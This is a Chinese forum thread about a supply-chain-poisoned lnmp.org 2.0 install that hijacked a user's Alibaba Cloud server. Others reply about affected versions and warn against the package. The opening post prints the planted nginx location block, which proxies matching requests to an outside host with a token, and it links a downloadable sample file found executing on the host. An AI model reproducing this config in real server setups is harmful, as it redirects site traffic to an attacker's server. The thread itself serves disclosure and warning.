[疑问] lnmp.org2.0阿里云主机被跳转代x理

moe

4月前

location ~* /.*pkav.* {
proxy_set_header X-Static-Token "ailunnb666";
proxy_pass http://hdx.toonb.cc;
proxy_set_header X-Forwarded-Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header REMOTE-HOST $host;
proxy_http_version 1.1;

add_header X-Cache $upstream_cache_status;

set $static_fileMJrCAYTq 0;
if ($uri ~* ".(gif|png|jpg|css|js|woff|woff2)$") {
      set $static_fileMJrCAYTq 1;
      expires 1m;
}
if ($static_fileMJrCAYTq = 0) {
      add_header Cache-Control no-cache;
}
}
      include enable-php-pathinfo.conf;

      location ~ .*.(gif|jpg|jpeg|png|bmp|swf)$
      {
         expires    30d;
      }

      location ~ .*.(js|css)?$
      {
         expires    12h;
      }

      location ~ /.well-known {
         allow all;
      }

      location ~ /.
      {
         deny all;
      }

      location / {
         return 301 https://$host$request_uri;
      }

access_log off;
}各位有相关服务的可以排查下。真是离谱啊

官网版本？和官方有通讯的就别用了

这里找到了一个文件。是多出在安装目录，并执行的，真是**。

xs.zip

2 小时前上传

点击文件名下载附件

39.53 KB, 下载次数: 11

这不是早被放毒了吗，咋还在用，宝塔都比他放心

随波逐流发表于 2024-7-22 12:50
这不是早被放毒了吗，咋还在用，宝塔都比他放心

去年装的，就是懒，然后这个症状还不一样。

我天翼云盘里有一个lnmp完整包备份文件夹，不知道哪个坏透了了的傻X分享的备份，我转存了，后来发现2.0就是被投毒的版本，那还备份个毛。

LNMP 投毒之後我一直再用這個

https://github.com/moeYuiYui/lnmp

不敢用了。。。。

jekyll 发表于 2024-7-22 12:59
我天翼云盘里有一个lnmp完整包备份文件夹，不知道哪个坏透了了的傻X分享的备份，我转存了，后来发现2.0就是 …

mjj说1.8及之前的应该没投毒，等大佬测试

莆田郑少斌发表于 2024-7-22 13:35
mjj说1.8及之前的应该没投毒，等大佬测试

没用，完全离线编译很难实现，你只要联网，就难免出问题，没时间去审计那么多脚本，除非军哥亲自说明过程中不会从vpser.net或者lnmp.org拉取数据。